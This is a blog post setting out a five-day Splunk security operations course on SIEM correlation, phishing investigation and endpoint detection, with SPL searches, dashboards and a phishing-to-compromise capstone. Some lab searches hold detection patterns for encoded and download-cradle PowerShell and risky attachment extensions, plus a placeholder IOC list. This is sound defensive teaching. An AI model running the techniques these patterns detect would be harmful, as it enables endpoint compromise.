Program Title
Splunk Security Operations Masterclass: Email Security, SIEM & Endpoint Detection
Duration
5 Days
Recommended format: 6โ7 hours per day
Mode: Instructor-led + hands-on labs + final SOC investigation project
Target Audience
This program is suitable for:
| Audience | Benefit |
|---|---|
| SOC Analysts | Learn investigation and detection workflows |
| Security Engineers | Build searches, alerts, dashboards, and correlation logic |
| DevSecOps Engineers | Understand logging, endpoint telemetry, and SIEM integration |
| Splunk Beginners | Learn SPL, security data onboarding, and dashboards |
| Blue Team Learners | Practice phishing, endpoint, and SIEM use cases |
Prerequisites
Participants should have basic knowledge of:
| Area | Expected Knowledge |
|---|---|
| Linux/Windows | Basic commands, files, processes, services |
| Security | Malware, phishing, brute force, privilege escalation |
| Networking | IP, DNS, HTTP, SMTP, firewall logs |
| Splunk | Helpful but not mandatory |
| SIEM | Helpful but not mandatory |
Lab Environment
Recommended lab setup:
| Component | Purpose |
|---|---|
| Splunk Enterprise or Splunk Cloud Trial | Core log search and analysis |
| Splunk Enterprise Security, if available | SIEM, notable events, risk-based alerting |
| Splunk Security Essentials, if ES is not available | Detection use-case learning |
| Splunk CIM Add-on | Data normalization |
| Windows Event Logs / Sysmon Logs | Endpoint security labs |
| Linux auth/audit logs | Linux endpoint investigation |
| Email gateway logs or sample phishing logs | Email security labs |
| Sample firewall/proxy/DNS logs | Threat correlation |
| Optional Splunk SOAR | Automation and response |
| Optional Splunk Attack Analyzer | Email/phishing/malware analysis |
Important note: Splunk is not itself a replacement for a full EDR tool like CrowdStrike, Microsoft Defender for Endpoint, SentinelOne, or Carbon Black. In this program, โEndpoint Security with Splunkโ means collecting endpoint telemetry, normalizing it, detecting suspicious behavior, correlating with SIEM events, and supporting investigation/response.
Day 1 โ Splunk Security Foundation & SOC Data Onboarding
Theme
Build the Splunk foundation required for SIEM, email security, and endpoint monitoring.
Learning Objectives
By the end of Day 1, students will understand:
| Objective | Description |
|---|---|
| Splunk architecture | Indexers, search heads, forwarders, apps, add-ons |
| Security data onboarding | How logs enter Splunk |
| Indexing and sourcetypes | Why correct sourcetypes matter |
| SPL basics | Searching, filtering, transforming, reporting |
| CIM basics | Why normalized fields are important for SIEM use cases |
| SOC data sources | Email, endpoint, firewall, proxy, DNS, identity logs |
Morning Session: Concepts
1. What is Splunk in Security?
Topics:
- Splunk as a security analytics platform
- Difference between log management, SIEM, SOAR, UEBA, and XDR
- Where Splunk Enterprise Security fits
- SOC workflow: collect โ normalize โ detect โ investigate โ respond โ report
2. Splunk Architecture for Security
Topics:
- Splunk Enterprise
- Splunk Cloud
- Universal Forwarder
- Heavy Forwarder
- Indexer
- Search Head
- Deployment Server
- Apps and Add-ons
- Splunk Enterprise Security
- Splunk SOAR
- Splunk Attack Analyzer
3. Security Log Sources
Important data sources:
| Category | Example Logs |
|---|---|
| Identity | AD, Okta, Azure AD, LDAP |
| Endpoint | Windows Event Logs, Sysmon, Linux auditd, EDR |
| M365, Google Workspace, Proofpoint, Mimecast, Exchange | |
| Network | Firewall, VPN, DNS, proxy |
| Cloud | AWS CloudTrail, Azure Activity Logs, GCP Audit Logs |
| Application | Web, API, authentication, transaction logs |
| Threat Intel | IOC feeds, reputation lists, malware hashes |
4. SPL Basics for Security
Core SPL commands:
index=* earliest=-24h
index=security sourcetype=windows:security EventCode=4625
index=email action=blocked
| stats count by sender, recipient, subject
index=endpoint process_name=powershell.exe
| table _time host user process_name command_line
index=*
| stats count by sourcetype
Afternoon Hands-On Labs
Lab 1.1 โ Explore Splunk Search
Tasks:
- Login to Splunk.
- Open Search & Reporting.
- Search all available indexes.
- Identify available sourcetypes.
- Find top hosts sending logs.
- Create a basic table of events.
Example SPL:
index=*
| stats count by index, sourcetype, host
| sort -count
Lab 1.2 โ Create Security Indexes
Create sample indexes:
| Index | Purpose |
|---|---|
email_security | Email gateway and phishing logs |
endpoint_security | Endpoint logs |
siem_security | General SIEM events |
threat_intel | IOC and reputation data |
Lab 1.3 โ Upload Sample Security Logs
Upload or ingest:
- Sample email logs
- Sample Windows security logs
- Sample Sysmon logs
- Sample DNS/proxy/firewall logs
Lab 1.4 โ Basic Dashboard
Create a dashboard with:
| Panel | Purpose |
|---|---|
| Event count by sourcetype | Data inventory |
| Failed logins by user | Identity security |
| Top suspicious email senders | Email security |
| Top endpoint processes | Endpoint visibility |
| Top blocked destinations | Network security |
Day 1 Deliverables
Students should produce:
- Data source inventory
- Basic Splunk searches
- Security indexes
- First SOC visibility dashboard
Day 2 โ Splunk SIEM with Enterprise Security Concepts
Theme
Learn how Splunk works as a SIEM: correlation, notable events, dashboards, risk-based alerting, and investigations.
Splunk Enterprise Security uses correlation searches and risk-based alerting concepts to help SOC teams reduce alert noise and prioritize higher-risk activity. (Splunk Docs)
Learning Objectives
By the end of Day 2, students will understand:
| Objective | Description |
|---|---|
| SIEM workflow | Detection, triage, investigation, response |
| Correlation searches | How SIEM detections are built |
| Notable events | How alerts become investigation items |
| Risk-based alerting | How multiple weak signals become stronger detections |
| Threat intelligence | IOC enrichment |
| MITRE ATT&CK mapping | Mapping detections to adversary behavior |
Morning Session: Concepts
1. What is SIEM?
SIEM stands for Security Information and Event Management.
Core SIEM capabilities:
| Capability | Description |
|---|---|
| Log collection | Gather security logs from many systems |
| Normalization | Convert different logs into common fields |
| Correlation | Connect related events |
| Detection | Identify suspicious activity |
| Alerting | Notify analysts |
| Investigation | Search and pivot across evidence |
| Reporting | Compliance and executive visibility |
2. Splunk Enterprise Security Overview
Topics:
- Security posture dashboards
- Incident Review
- Notable events
- Correlation searches
- Asset and identity framework
- Threat intelligence framework
- Risk-based alerting
- Investigation workflow
- Security domains
3. SIEM Detection Engineering
Detection design structure:
| Element | Example |
|---|---|
| Threat | Brute-force login |
| Data source | Windows Security Logs |
| Fields | user, src_ip, dest, action |
| Detection logic | 10 failed logins in 5 minutes |
| Severity | Medium/High |
| MITRE mapping | Credential Access |
| Response | Disable account, investigate host |
4. Risk-Based Alerting
Traditional alerting:
One rule fires = one alert
Risk-based alerting:
Multiple suspicious events + same user/host = higher risk score
Example:
| Event | Risk Score |
|---|---|
| Suspicious email clicked | 25 |
| PowerShell encoded command | 40 |
| Login from unusual country | 35 |
| Total risk for user | 100 |
Afternoon Hands-On Labs
Lab 2.1 โ Failed Login Detection
Use failed authentication events.
Example SPL:
index=endpoint_security EventCode=4625
| stats count by user, src_ip
| where count > 5
| sort -count
Lab 2.2 โ Brute Force Followed by Success
index=endpoint_security (EventCode=4625 OR EventCode=4624)
| stats
count(eval(EventCode=4625)) as failed_logins
count(eval(EventCode=4624)) as successful_logins
values(src_ip) as src_ip
by user
| where failed_logins >= 5 AND successful_logins >= 1
Code language: JavaScript (javascript)Lab 2.3 โ Create a Correlation Search
Detection name:
Multiple Failed Logins Followed by Success
Severity:
High
MITRE mapping:
Credential Access / Brute Force
Action:
Create notable event or alert
Lab 2.4 โ Threat Intel IOC Matching
Sample IOC lookup:
ioc,type,severity
malicious-domain.com,domain,high
185.10.20.30,ip,critical
badfilehash123,hash,high
Code language: CSS (css)Example SPL:
index=proxy OR index=dns
| lookup threat_ioc_lookup ioc as query OUTPUT severity type
| where isnotnull(severity)
| table _time host user query type severity
Code language: JavaScript (javascript)Lab 2.5 โ SIEM Dashboard
Create panels:
| Panel | Purpose |
|---|---|
| High severity alerts | SOC triage |
| Top risky users | Risk-based investigation |
| Top risky hosts | Endpoint priority |
| Threat intel matches | IOC visibility |
| Failed login trends | Identity attack tracking |
Day 2 Deliverables
Students should produce:
- SIEM detection search
- Correlation search design
- Threat intelligence lookup
- SOC triage dashboard
- Basic investigation workflow
Day 3 โ Splunk for Email Security & Phishing Investigation
Theme
Detect and investigate phishing, malicious attachments, suspicious links, spoofing, and compromised mailboxes.
Splunk Attack Analyzer can automate analysis of phishing and malware threats, including suspicious emails, URLs, files, and attack chains. Splunk documentation also describes phishing investigation workflows inside Splunk Enterprise Security powered by Attack Analyzer. (Splunk Lantern)
Learning Objectives
By the end of Day 3, students will understand:
| Objective | Description |
|---|---|
| Email attack types | Phishing, spoofing, BEC, malware, spam |
| Email security logs | Sender, recipient, subject, URL, attachment, verdict |
| Email CIM mapping | Normalize email logs |
| Phishing investigation | Analyze sender, URL, attachment, recipients |
| Attack Analyzer | Automated phishing/malware analysis |
| SOAR workflow | Automate investigation and response |
Morning Session: Concepts
1. Email Security Fundamentals
Common email threats:
| Threat | Description |
|---|---|
| Phishing | Fake email designed to steal credentials |
| Spear phishing | Targeted phishing |
| Business Email Compromise | Fraud using trusted identity |
| Malware attachment | File-based compromise |
| Malicious URL | Link to phishing or malware site |
| Spoofing | Forged sender identity |
| Account takeover | Real mailbox used maliciously |
2. Important Email Security Fields
| Field | Example |
|---|---|
| sender | attacker@example.com |
| recipient | user@company.com |
| subject | Password Expiry Notice |
| src_ip | Sender IP |
| attachment_name | invoice.exe |
| url | hxxp://fake-login.example |
| verdict | malicious/suspicious/clean |
| action | delivered/blocked/quarantined |
| message_id | Unique email ID |
3. Email Authentication Concepts
Students should understand:
| Control | Purpose |
|---|---|
| SPF | Checks allowed sending servers |
| DKIM | Verifies message signing |
| DMARC | Defines domain policy for SPF/DKIM failures |
| URL rewriting | Tracks and protects clicked links |
| Sandboxing | Executes suspicious file safely |
| Quarantine | Holds suspicious email |
4. Phishing Investigation Workflow
Recommended workflow:
Suspicious Email Alert
โ
Check Sender Reputation
โ
Analyze Subject and Body
โ
Extract URLs and Attachments
โ
Check Recipients
โ
Check Click Activity
โ
Check Endpoint Activity
โ
Contain Mailbox / Host
โ
Close Investigation
Afternoon Hands-On Labs
Lab 3.1 โ Top Suspicious Email Senders
index=email_security
| stats count by sender, sender_domain, action, verdict
| sort -count
Lab 3.2 โ Detect External Sender Spoofing Internal Domain
index=email_security sender_domain="company.com" src_ip!="trusted_mail_gateway_ip"
| table _time sender recipient subject src_ip action verdict
Code language: JavaScript (javascript)Lab 3.3 โ Detect Malicious Attachments
index=email_security attachment_name=*
| eval suspicious_attachment=if(match(attachment_name, "\.(exe|scr|js|vbs|hta|iso|img|lnk)$"), "yes", "no")
| where suspicious_attachment="yes"
| table _time sender recipient subject attachment_name verdict action
Code language: JavaScript (javascript)Lab 3.4 โ Detect Suspicious URLs
index=email_security url=*
| eval suspicious_url=if(match(url, "(login|verify|password|invoice|payment|secure)"), "yes", "no")
| where suspicious_url="yes"
| stats count values(url) as urls by sender, recipient, subject
Code language: JavaScript (javascript)Lab 3.5 โ Phishing Campaign Detection
index=email_security
| stats
dc(recipient) as unique_recipients
values(recipient) as recipients
values(url) as urls
values(attachment_name) as attachments
by sender, subject
| where unique_recipients > 10
| sort -unique_recipients
Code language: JavaScript (javascript)Lab 3.6 โ Email-to-Endpoint Pivot
Scenario:
A user received a phishing email and clicked a URL. Now check endpoint activity.
Step 1: Find recipient.
index=email_security verdict=malicious
| table _time sender recipient subject url attachment_name
Step 2: Pivot to endpoint.
index=endpoint_security user="victim.user"
| table _time host user process_name command_line parent_process_name
Code language: JavaScript (javascript)Step 3: Look for suspicious browser or PowerShell activity.
index=endpoint_security user="victim.user"
(process_name="powershell.exe" OR process_name="cmd.exe" OR process_name="wscript.exe" OR process_name="mshta.exe")
| table _time host user process_name command_line parent_process_name
Code language: JavaScript (javascript)Lab 3.7 โ Email Security Dashboard
Create dashboard panels:
| Panel | Purpose |
|---|---|
| Malicious emails by verdict | Email threat visibility |
| Top phishing senders | Campaign detection |
| Top targeted users | User risk |
| Suspicious attachments | Malware tracking |
| URL clicks by user | Compromise investigation |
| Email action summary | Delivered vs blocked |
Day 3 Deliverables
Students should produce:
- Email security search pack
- Phishing investigation workflow
- Email security dashboard
- Email-to-endpoint pivot process
- Phishing campaign detection report
Day 4 โ Splunk for Endpoint Security
Theme
Detect suspicious endpoint behavior using Windows, Linux, Sysmon, EDR, and process telemetry.
The Splunk CIM Endpoint data model is designed for monitoring endpoint clients such as user machines and laptops. It covers endpoint-related events such as processes, services, files, and ports. (docs.splunk.com)
Learning Objectives
By the end of Day 4, students will understand:
| Objective | Description |
|---|---|
| Endpoint telemetry | Process, file, registry, service, network |
| Windows security logs | Logon, privilege use, account changes |
| Sysmon logs | Process creation, network, file, registry |
| Linux endpoint logs | auth.log, auditd, sudo, SSH |
| EDR integration | How EDR logs support SIEM |
| Malware behavior | PowerShell, persistence, lateral movement |
| Endpoint dashboards | Host and user investigation views |
Morning Session: Concepts
1. Endpoint Security Data Sources
| Source | Use |
|---|---|
| Windows Security Logs | Authentication, privilege, account changes |
| Sysmon | Process, network, file, registry behavior |
| PowerShell Logs | Script execution and suspicious commands |
| Linux auth logs | SSH, sudo, failed login |
| auditd | Linux process and file activity |
| EDR logs | Malware, behavioral detection, quarantine |
| DNS/proxy logs | External communication from endpoint |
2. Important Windows Event IDs
| Event ID | Meaning |
|---|---|
| 4624 | Successful login |
| 4625 | Failed login |
| 4672 | Special privileges assigned |
| 4688 | Process creation |
| 4720 | User account created |
| 4728 | User added to privileged group |
| 4732 | User added to local group |
| 7045 | New service installed |
3. Endpoint Attack Behaviors
| Behavior | Example |
|---|---|
| Suspicious PowerShell | Encoded command |
| Credential dumping | LSASS access |
| Persistence | New service, scheduled task |
| Lateral movement | Remote admin tools |
| Malware execution | Suspicious child process |
| Defense evasion | Disabling antivirus |
| Data staging | Archive files created |
| Exfiltration | Upload to unknown destination |
4. Endpoint Detection Workflow
Endpoint Alert
โ
Identify Host and User
โ
Review Process Tree
โ
Check Parent/Child Process
โ
Check Network Connections
โ
Check File/Registry Changes
โ
Correlate with Email, DNS, Proxy, Identity
โ
Contain or Escalate
Code language: JavaScript (javascript)Afternoon Hands-On Labs
Lab 4.1 โ Suspicious PowerShell Detection
index=endpoint_security process_name="powershell.exe"
| where match(command_line, "(?i)(-enc|encodedcommand|downloadstring|iex|invoke-expression|bypass)")
| table _time host user parent_process_name process_name command_line
Code language: JavaScript (javascript)Lab 4.2 โ Office Application Spawning Script Interpreter
index=endpoint_security
(parent_process_name="winword.exe" OR parent_process_name="excel.exe" OR parent_process_name="outlook.exe")
(process_name="powershell.exe" OR process_name="cmd.exe" OR process_name="wscript.exe" OR process_name="mshta.exe")
| table _time host user parent_process_name process_name command_line
Code language: JavaScript (javascript)Lab 4.3 โ New Service Installation
index=endpoint_security EventCode=7045
| table _time host user service_name service_file_name
Lab 4.4 โ Privileged User Group Change
index=endpoint_security EventCode IN (4728,4732)
| table _time host user member_name group_name
Lab 4.5 โ Linux SSH Brute Force
index=endpoint_security sourcetype=linux_secure "Failed password"
| rex "from (?<src_ip>\d+\.\d+\.\d+\.\d+)"
| stats count by src_ip, host
| where count > 10
| sort -count
Code language: JavaScript (javascript)Lab 4.6 โ Suspicious Linux Sudo Activity
index=endpoint_security sourcetype=linux_secure sudo
| stats count values(command) as commands by user, host
| sort -count
Code language: JavaScript (javascript)Lab 4.7 โ Endpoint Investigation Dashboard
Create panels:
| Panel | Purpose |
|---|---|
| Top suspicious processes | Malware behavior |
| PowerShell activity | Script abuse |
| Failed logins by host | Brute force |
| New services installed | Persistence |
| Privilege changes | Account abuse |
| Endpoint risk by host | SOC prioritization |
Day 4 Deliverables
Students should produce:
- Endpoint detection search pack
- Windows endpoint dashboard
- Linux endpoint dashboard
- Endpoint investigation playbook
- MITRE ATT&CK mapping for endpoint detections
Day 5 โ Integrated SOC Capstone: Email + SIEM + Endpoint Security
Theme
Students complete a realistic SOC investigation from phishing email to endpoint compromise and SIEM reporting.
Learning Objectives
By the end of Day 5, students will be able to:
| Objective | Description |
|---|---|
| Investigate full attack chain | Email โ user โ endpoint โ network |
| Correlate logs | Email, endpoint, DNS, proxy, identity |
| Build SIEM alerting | Create detection and response workflow |
| Prioritize risk | Use severity and risk scoring |
| Document incident | Prepare SOC report |
| Present findings | Explain timeline, impact, response |
Capstone Scenario
Scenario Name
Phishing Email Leading to Endpoint Compromise
Story
A user receives an email with the subject:
Urgent: Password Verification Required
Code language: HTTP (http)The user clicks a suspicious URL. Shortly after, the endpoint executes PowerShell with an encoded command. The host then communicates with an unknown external IP address. The SOC must investigate and determine whether the incident is a true positive.
Data Sources Used
| Data Source | Purpose |
|---|---|
| Email logs | Identify phishing email |
| Endpoint logs | Detect malicious process |
| Windows logs | Validate user and host activity |
| DNS logs | Identify suspicious domain lookup |
| Proxy logs | Confirm URL access |
| Threat intel | Check IOC reputation |
| SIEM alerts | Prioritize and report |
Morning Session: Guided Capstone Build
Step 1 โ Identify Suspicious Email
index=email_security
(subject="*Password Verification*" OR subject="*Urgent*")
| table _time sender recipient subject url attachment_name verdict action
Code language: JavaScript (javascript)Step 2 โ Find All Recipients
index=email_security subject="*Password Verification*"
| stats values(recipient) as recipients dc(recipient) as recipient_count by sender, subject, url
Code language: JavaScript (javascript)Step 3 โ Identify Clicked URL
index=proxy OR index=email_security url=*
| search url="*verification*"
| table _time user src_ip url action
Code language: JavaScript (javascript)Step 4 โ Pivot to Endpoint
index=endpoint_security user="victim.user"
| table _time host user process_name parent_process_name command_line
Code language: JavaScript (javascript)Step 5 โ Detect Suspicious PowerShell
index=endpoint_security user="victim.user" process_name="powershell.exe"
| where match(command_line, "(?i)(-enc|downloadstring|iex|bypass)")
| table _time host user parent_process_name process_name command_line
Code language: JavaScript (javascript)Step 6 โ Check External Communication
index=dns OR index=proxy
user="victim.user"
| stats values(query) as domains values(dest_ip) as dest_ips by user, src_ip
Code language: JavaScript (javascript)Step 7 โ Check Threat Intel
index=dns OR index=proxy
| lookup threat_ioc_lookup ioc as query OUTPUT severity type
| where isnotnull(severity)
| table _time user src_ip query type severity
Code language: JavaScript (javascript)Afternoon Session: Final Project
Students must build the following:
1. Detection Rules
| Detection | Required Logic |
|---|---|
| Phishing email campaign | Same sender/subject sent to many users |
| Suspicious URL click | User clicked suspicious URL |
| Office spawning PowerShell | Outlook/Word/Excel โ PowerShell |
| Encoded PowerShell | PowerShell with -enc or suspicious command |
| IOC match | Domain/IP/hash matched threat intel |
| High-risk user | Email + endpoint + IOC activity |
2. Risk Scoring Model
Example:
| Event | Risk Score |
|---|---|
| Malicious email delivered | 20 |
| User clicked URL | 30 |
| Suspicious PowerShell executed | 40 |
| IOC matched | 50 |
| Privileged user involved | 25 |
Final risk logic:
If total risk score >= 80, create high severity notable event.
3. SOC Dashboard
Required panels:
| Panel | Description |
|---|---|
| Active security incidents | Current high-risk alerts |
| Email threat summary | Phishing, malware, spam |
| Top targeted users | Users receiving suspicious emails |
| Endpoint compromise indicators | Suspicious process and command line |
| Threat intel matches | IOC activity |
| Incident timeline | Full attack chain |
4. Incident Report
Students must prepare a final incident report with:
| Section | Required Content |
|---|---|
| Executive Summary | What happened |
| Timeline | When each event occurred |
| Affected Users | Who was targeted |
| Affected Hosts | Which systems were involved |
| IOCs | Domains, IPs, hashes, URLs |
| Evidence | SPL results and screenshots |
| Severity | Low/Medium/High/Critical |
| Root Cause | How attack started |
| Impact | What was compromised or attempted |
| Response Actions | Quarantine, block, disable, reset |
| Lessons Learned | Detection and prevention improvements |
Day 5 Deliverables
Students should submit:
- Final SOC dashboard
- Detection rule pack
- Risk scoring logic
- Incident investigation timeline
- Final incident report
- Presentation of findings
Complete 5-Day Agenda Summary
| Day | Main Topic | Core Outcome |
|---|---|---|
| Day 1 | Splunk Security Foundation | Data onboarding, SPL, dashboards, CIM basics |
| Day 2 | SIEM with Splunk Enterprise Security | Correlation searches, notable events, RBA, threat intel |
| Day 3 | Email Security | Phishing detection, malicious URL/attachment analysis |
| Day 4 | Endpoint Security | Windows/Linux endpoint detection and investigation |
| Day 5 | Integrated SOC Capstone | Full attack-chain investigation and final report |
Recommended Practical Assignments
Assignment 1 โ SPL Search Practice
Create 10 SPL searches:
- Top email senders
- Top email recipients
- Failed logins by user
- Failed logins by source IP
- Suspicious PowerShell
- New service installed
- Suspicious attachment
- Malicious URL click
- IOC match
- User risk summary
Assignment 2 โ Email Security Dashboard
Build a dashboard containing:
- Delivered vs blocked emails
- Top suspicious senders
- Top targeted recipients
- Suspicious attachments
- Suspicious URLs
- Phishing campaign view
Assignment 3 โ Endpoint Security Dashboard
Build a dashboard containing:
- Top risky hosts
- Top risky users
- Suspicious PowerShell
- Office spawning command shell
- Failed login trend
- New service installation
Assignment 4 โ SIEM Detection Engineering
Create three detections:
| Detection | Severity |
|---|---|
| Brute force followed by success | High |
| Phishing email clicked | High |
| Suspicious PowerShell after email click | Critical |
Assignment 5 โ Final SOC Investigation
Investigate one complete incident and submit:
- Timeline
- Evidence
- IOCs
- Affected users
- Affected hosts
- Final verdict
- Recommended response
Final Project Evaluation Rubric
| Area | Weight |
|---|---|
| SPL correctness | 20% |
| SIEM detection quality | 20% |
| Email security investigation | 15% |
| Endpoint investigation | 15% |
| Dashboard quality | 10% |
| Incident report quality | 10% |
| Final presentation | 10% |
Course Outcome
After this 5-day program, students should be able to:
- Use Splunk for real-world SOC investigations.
- Onboard and search email, endpoint, identity, and network logs.
- Build SIEM detections using SPL.
- Investigate phishing and malicious email campaigns.
- Detect suspicious endpoint behavior.
- Correlate email and endpoint events into one attack story.
- Build SOC dashboards and incident reports.
- Understand how Splunk Enterprise Security, SOAR, and Attack Analyzer fit into a modern SOC workflow.
Iโm a DevOps/SRE/DevSecOps/Cloud Expert passionate about sharing knowledge and experiences. I have worked at Cotocus. I share tech blog at DevOps School, travel stories at Holiday Landmark, stock market tips at Stocks Mantra, health and fitness guidance at My Medic Plus, product reviews at TrueReviewNow , and SEO strategies at Wizbrand.
Do you want to learn Quantum Computing?
Please find my social handles as below;
Rajesh Kumar Personal Website
Rajesh Kumar at YOUTUBE
Rajesh Kumar at INSTAGRAM
Rajesh Kumar at X
Rajesh Kumar at FACEBOOK
Rajesh Kumar at LINKEDIN
Rajesh Kumar at WIZBRAND
Find Trusted Cardiac Hospitals
Compare heart hospitals by city and services โ all in one place.
Explore Hospitals